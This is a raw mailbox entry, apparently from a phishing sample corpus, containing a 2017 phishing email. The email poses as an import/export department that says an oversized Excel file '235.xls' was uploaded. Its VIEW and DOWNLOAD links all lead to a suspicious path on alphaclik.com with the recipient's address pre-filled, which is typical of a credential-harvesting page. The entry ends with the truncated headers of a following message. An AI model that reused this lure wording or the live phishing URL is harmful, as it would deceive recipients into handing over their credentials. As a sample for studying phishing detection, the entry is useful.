From: "Liun" <glendy@jef.com.hk>
Date: Tue, 26 Sep 2017 17:11:53 -0330
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 323

You will not see this in a MIME-aware mail reader.
--===============0796581016==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Good Morning,
   I have been trying to send you this file but was unsuccessful with attac=
hing them to my email because the file is too large, then i manage to uploa=
d, so i secured them in the excel for you.   Thanks =

Regards IMP & EXP Dept     235.xls  | File  (total 217.3 MB)   VIEW | DOWNL=
OAD =20

--===============0796581016==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/>
		<title></title>
	</head>
	<body><P id=3Dyui_3_16_0_ym19_1_1481022652011_6377 style=3D'FONT-SIZE: 13p=
x; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida Gra=
nde", sans-serif; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px;=
 MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); -webk=
it-padding-start: 0px'><SPAN id=3Dyiv9842577460yui_3_16_0_1_6757456533331_5=
1298 style=3D"COLOR: rgb(0,0,255); -webkit-padding-start: 0px">Good Morning=
,</SPAN></P>
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51218 style=3D'FONT-SIZE:=
 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida=
 Grande", sans-serif; BACKGROUND-COLOR: rgb(255,255,255); -webkit-padding-s=
tart: 0px'>&nbsp;</DIV>
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51275 style=3D'FONT-SIZE:=
 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida=
 Grande", sans-serif; BACKGROUND-COLOR: rgb(255,255,255); -webkit-padding-s=
tart: 0px'><SPAN id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51274 style=
=3D"COLOR: rgb(0,0,255); -webkit-padding-start: 0px">I have been trying to =
send you this file but was unsuccessful with attaching them to my email bec=
ause the file is too large, then i manage to upload, so i secured them in t=
he excel for you.</SPAN></DIV>
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51294 style=3D'FONT-SIZE:=
 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida=
 Grande", sans-serif; BACKGROUND-COLOR: rgb(255,255,255); -webkit-padding-s=
tart: 0px'>&nbsp;</DIV>
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51293 style=3D'FONT-SIZE:=
 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida=
 Grande", sans-serif; BACKGROUND-COLOR: rgb(255,255,255); -webkit-padding-s=
tart: 0px'><SPAN style=3D"COLOR: rgb(0,0,255); -webkit-padding-start: 0px">=
Thanks</SPAN></DIV>
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51276 style=3D'FONT-SIZE:=
 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida=
 Grande", sans-serif; BACKGROUND-COLOR: rgb(255,255,255); -webkit-padding-s=
tart: 0px'><BR style=3D"-webkit-padding-start: 0px"><SPAN style=3D"COLOR: r=
gb(0,0,255); -webkit-padding-start: 0px">Regards</SPAN></DIV>
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51277 style=3D'FONT-SIZE:=
 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Helvetica, Arial, "Lucida=
 Grande", sans-serif; BACKGROUND-COLOR: rgb(255,255,255); -webkit-padding-s=
tart: 0px'><SPAN style=3D"COLOR: rgb(0,0,255); -webkit-padding-start: 0px">=
IMP &amp; EXP Dept</SPAN></DIV>
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51279 style=3D"FONT-SIZE:=
 12px; FONT-FAMILY: Arial, Helvetica, sans-serif; BORDER-BOTTOM: rgb(235,23=
5,235) 1px solid; COLOR: rgb(69,69,69); PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 1.2em; PADDING-RIGHT: 0px;=
 BACKGROUND-COLOR: rgb(255,255,255); -webkit-padding-start: 0px">
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51278 style=3D"PADDING-BO=
TTOM: 14px; PADDING-TOP: 12px; PADDING-LEFT: 0px; MARGIN: 0px; LINE-HEIGHT:=
 1.2em; PADDING-RIGHT: 0px; -webkit-padding-start: 0px">
<DIV id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51286 style=3D"FLOAT: lef=
t; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN-LEFT: 0=
px; MIN-HEIGHT: 17px; MARGIN-TOP: 0px; LINE-HEIGHT: 17px; PADDING-RIGHT: 0p=
x; MARGIN-RIGHT: 0px; -webkit-padding-start: 0px"><SPAN style=3D"-webkit-pa=
dding-start: 0px">&nbsp;&nbsp;</SPAN><SPAN style=3D'FONT-SIZE: medium; FONT=
-FAMILY: "Times New Roman"; BORDER-COLLAPSE: separate; -webkit-padding-star=
t: 0px'><SPAN style=3D"FONT-SIZE: 16px; LINE-HEIGHT: 19px; -webkit-padding-=
start: 0px"><SPAN style=3D"-webkit-padding-start: 0px"><A style=3D"TEXT-DEC=
ORATION: none; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: rgb=
(51,102,204); OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px;=
 OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert=
; LINE-HEIGHT: 20px; PADDING-RIGHT: 0px; -webkit-padding-start: 0px" href=
=3D"http://alphaclik.com/.well-known/mirco/?email=3Djose@monkey.org" rel=3D=
nofollow target=3D_blank><SPAN style=3D"FONT-WEIGHT: 700; -webkit-padding-s=
tart: 0px">235.xls</SPAN></A></SPAN><SPAN style=3D"-webkit-padding-start: 0=
px"><SPAN style=3D"-webkit-padding-start: 0px">&nbsp;&nbsp;</SPAN><SPAN sty=
le=3D"-webkit-padding-start: 0px"><SPAN style=3D"FONT-WEIGHT: 700; -webkit-=
padding-start: 0px">|</SPAN></SPAN><SPAN style=3D"-webkit-padding-start: 0p=
x">&nbsp;File&nbsp; (total 217.3 MB)</SPAN></SPAN></SPAN></SPAN><SPAN style=
=3D"-webkit-padding-start: 0px">&nbsp;&nbsp;&nbsp;</SPAN><SPAN id=3Dyiv9842=
577460yui_3_16_0_1_6757456533331_51292 style=3D"-webkit-padding-start: 0px"=
><SPAN id=3Dyui_3_16_0_ym19_1_1481022652011_6393 style=3D"FONT-WEIGHT: 700;=
 -webkit-padding-start: 0px"><A id=3Dyui_3_16_0_ym19_1_1481022652011_6392 t=
itle=3D"View Online" style=3D"BACKGROUND: none transparent scroll repeat 0%=
 0%; COLOR: rgb(25,106,212); OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PA=
DDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; OUTLIN=
E-COLOR: invert; PADDING-RIGHT: 0px; -webkit-padding-start: 0px" href=3D"ht=
tp://alphaclik.com/.well-known/mirco/?email=3Djose@monkey.org" rel=3Dnofoll=
ow target=3D_blank><SPAN style=3D"-webkit-padding-start: 0px">V</SPAN><SPAN=
 id=3Dyui_3_16_0_ym19_1_1481022652011_6391 style=3D"-webkit-padding-start: =
0px">IEW</SPAN></A><SPAN id=3Dyui_3_16_0_ym19_1_1481022652011_6394 style=3D=
"-webkit-padding-start: 0px">&nbsp;</SPAN></SPAN><SPAN id=3Dyui_3_16_0_ym19=
_1_1481022652011_6396 style=3D"-webkit-padding-start: 0px"><SPAN id=3Dyui_3=
_16_0_ym19_1_1481022652011_6395 style=3D"FONT-WEIGHT: 700; -webkit-padding-=
start: 0px">|</SPAN></SPAN><SPAN id=3Dyiv9842577460yui_3_16_0_1_67574565333=
31_51291 style=3D"FONT-WEIGHT: 700; -webkit-padding-start: 0px"><SPAN id=3D=
yiv9842577460yui_3_16_0_1_6757456533331_51290 style=3D"-webkit-padding-star=
t: 0px">&nbsp;<SPAN id=3Dyiv9842577460yui_3_16_0_1_6757456533331_51289 styl=
e=3D"-webkit-padding-start: 0px"><A id=3Dyiv9842577460yui_3_16_0_1_67574565=
33331_51288 title=3D"View Online" style=3D"BACKGROUND: none transparent scr=
oll repeat 0% 0%; COLOR: rgb(25,106,212); OUTLINE-WIDTH: medium; PADDING-BO=
TTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN=
: 0px; OUTLINE-COLOR: invert; PADDING-RIGHT: 0px; -webkit-padding-start: 0p=
x" href=3D"http://alphaclik.com/.well-known/mirco/?email=3Djose@monkey.org"=
 rel=3Dnofollow target=3D_blank><SPAN id=3Dyiv9842577460yui_3_16_0_1_675745=
6533331_51287 style=3D"-webkit-padding-start: 0px">DOWNLOAD</SPAN></A></SPA=
N></SPAN></SPAN></SPAN></DIV></DIV></DIV>
<P>&nbsp;</P></BODY></HTML>
--===============0796581016==--


From jose@monkey.org Wed Sep 27 13:19:33 2017 +0000
Return-Path: prvs=744306cbd1=aeckerle@pbcgov.org
Delivered-To: jose@monkey.org
X-FDA: 73331733426.03.lip68_365399a90f415
X-Spam-Summary: 13,1.2,0,4cc7fbbbd90df02c,d41d8cd98f00b204,prvs=744306cbd1=aeckerle@pbcgov.org,:i@pinellascounty.org,RULES_HIT:10:41:72:355:379:582:960:962:967:978:983:988:989:1152:1158:1189:1208:1221:1256:1260:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1541:1575:1588:1589:1592:1594:1711:1714:1730:1777:1792:2198:2199:2525:2527:2553:2561:2564:2610:2682:2685:2731:2859:2895:2903:2907:2915:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3350:3866:3867:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4362:4416:4552:4860:5007:6117:6261:6703:7688:7903:8518:8583:8603:8957:8960:9025:9082:9873:9908:10008:10214:10346:10400:11257:11656:11658:11914:12043:12291:12438:12517:12519:12555:12683:13139:13237:14037:14093:14110:14181:14659:14721:14818:14885:21080:21433:21451:21627:30003:30019:30021:30022:30026:30037:30039:30054:30069:30070:30083:30090,0,RBL:151.132.50.246:@pbcgov.org:.lbl8.mailshell.net-62.2.0.100 64.100.201.201,Ca
X-HE-Tag: lip68_365399a90f415
X-Filterd-Recvd-Size: 3829
Received: from proofa3v-gcc.co.palm-beach.fl.us (proofa3v-gcc.co.palm-beach.fl.us [151.132.50.246])
	by imf29.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 27 Sep 2017 13:19:33 +0000 (UTC)
Received: from pbceochubcas02.pbcgov.org ([151.132.207.19])
	by proofa3v-gcc.co.palm-beach.fl.us (8.16.0.21/8.16.0.21) with ESMTPS id v8RD6uSn038740
	(version=TLSv1 cipher=AES128-SHA bits=128 verify=NOT);
	Wed, 27 Sep 2017 09:06:56 -0400
Received: from PBCEOCMBX02.pbcgov.org ([169.254.1.213]) by
 pbceochubcas02.pbcgov.org ([151.132.231.222]) with mapi id 14.03.0210.002;
 Wed, 27 Sep 2017 09:06:56 -0400
